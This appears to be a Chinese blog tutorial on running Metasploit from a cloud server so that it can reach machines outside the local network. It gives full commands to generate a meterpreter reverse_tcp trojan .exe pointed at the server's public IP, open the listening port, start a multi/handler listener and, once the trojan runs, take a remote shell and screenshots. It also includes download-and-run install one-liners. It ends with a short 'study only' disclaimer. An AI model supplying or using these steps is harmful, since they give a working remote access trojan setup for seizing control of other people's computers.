众所周知,Metasploit 是个内网渗透神器。
但是内网渗透哪有外网刺激,于是笔者上度娘搜索“msf 外网”。
搜索结果的话,
首先,虚拟机里的kali不能渗透到外网的原因是它没有外网IP。
所以大多数都是用内网穿透工具,还有一部分是通过服务器做个frp代理。
本质其实都一样。但是亲测后者比较有用。
可!是!
第二个方法有一个特点,就是很烦。
买好服务器之后再下载frp,服务器上下载完之后还得在Kali上面下。下载完天都黑了,还得改这个改那个。最后一堆ip还搞来搞去。
于是笔者就想到了。
既然都有服务器了,为啥不直接在服务器上安装msf呢???非得绕这么大圈子???
你需要这些东西
·一台能用ssh的电脑(本文以 Mac 为例)
·一台 Linux 云服务器/云主机/ECS/VPS(名字不同,实质一样,不过不是虚拟主机哦)(本文以 Debian 10 系统为例)(现在市面上的那种免费云主机就能用了)
·一台没开杀毒软件的 Windows 电脑(虚拟机)(本文以 XP SP3 为例)
安装 msf
(msf就是 Metasploit Framework 的简称)
首先你需要用ssh连上你的服务器。具体步骤我就不赘述了,可以自行百度,服务器提供商应该也有教程提供。
用以下命令下载msf的安装包。
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
将其设为可执行文件。
chmod +x msfinstall
运行安装包。
./msfinstall
初始化数据库
msfdb init
(运行到这里笔者的服务器报错说在root用户下不能运行这个命令,所以我就直接略过初始化数据库了,其实不运行这个命令貌似也不会有什么问题)
然后你的服务器上就已经安装好了msf。
配置宝塔面板
因为这是服务器,不是虚拟机。上传下载文件非常不方便。所以我们这里安装一个宝塔面板。
wget -O install.sh http://download.bt.cn/install/install-ubuntu_6.0.sh && bash install.sh
安装完之后,复制终端给的链接,进入面板。
它会跳出来让你推荐安装的东西。我们这里先不用安装。
生成木马
我们回到终端,运行下面的命令生成木马。
msfvenom -p windows/meterpreter/reverse_tcp lhost=(你的服务器外网ip) lport=(随便取个端口号) -f exe > /root/(木马文件名).exe
-p 设置payload,无需改动
lhost 监听IP,此处填你服务器的外网IP(一定要外网ip,不然目标机器找不到你。比如你家住在xx市xx路xx号xx室,你某宝买东西就填xx室,谁找得到你啊喂。)
lport 监听端口,这里随便写一个,最好是4位数,而且没有规律的那种。不然端口已经可能被占用了。
-f 生成文件的格式 > 文件放置的目录和文件名 (一般放在root目录下即可)
比如你的服务器外网ip是 某某某.某某某.某某某.某某某
端口想选 1086
木马文件放在 /root/iammuma.exe
你就应该运行
msfvenom -p windows/meterpreter/reverse_tcp lhost= 某某某.某某某.某某某.某某某 lport=1086 -f exe > /root/iammuma.exe
开放端口/下载木马
这时候,我们就需要用到宝塔面板了。
开放端口
点击左侧菜单中的 安全。
增加一个放行端口。
端口填上面的你选的。
备注/说明随便写。
下载木马
点击左侧菜单中的 文件 。
再点击根目录。
再点击进入root文件夹。
我们可以看到,木马已经生成了。
点击下载,然后拖入 Windows 虚拟机中。
先别急着运行木马。
开始监听
你需要把msf的监听打开,才能检测到木马返回的数据。
第一次,我设置lhost为127.0.0.1。
127.0.0.1是回送地址,指本地机,一般用来测试使用。——百度百科
结果
在虚拟机狂点木马也没反应。
于是我改用外网IP。
于是就成功了。hhhhh庆祝一下。
(看到meterpreter就是成功了,目标机基本上就已经被你掌握在手里了)
步骤:
1 进入msf
msfconsole
2 加载监听模块
use exploit/multi/handler
3 设置payload,要和木马设置的payload相同,如果你是按照上文来的话就不用修改。
set payload windows/meterpreter/reverse_tcp
4 设置监听ip,就是你的服务器外网ip
set lhost (服务器外网IP)
5 设置端口,lport后面的数字就是你之前设置的端口。如果你是按照上文来的话就也不用修改。
set lport 1086
6 开始监听
run
7 在虚拟机里点击木马。
(如果点一次不行就多点几次。一定要关掉杀毒软件!!!等10秒左右一般都能有了)
搞定之后
这里就写一下 meterpreter 的一些基本操作。
shell
这个命令就可以用目标机的cmd控制目标机。
screenshot
这个命令就可以给目标机截图。
我们可以在宝塔面板里找到截下来的图片。
总结
总的来说,就是在服务器上生成木马并监听,并且用宝塔面板开启端口并下载木马文件,最后在 Windows 上运行木马。
本教程仅供学习用,严禁用于非法用途。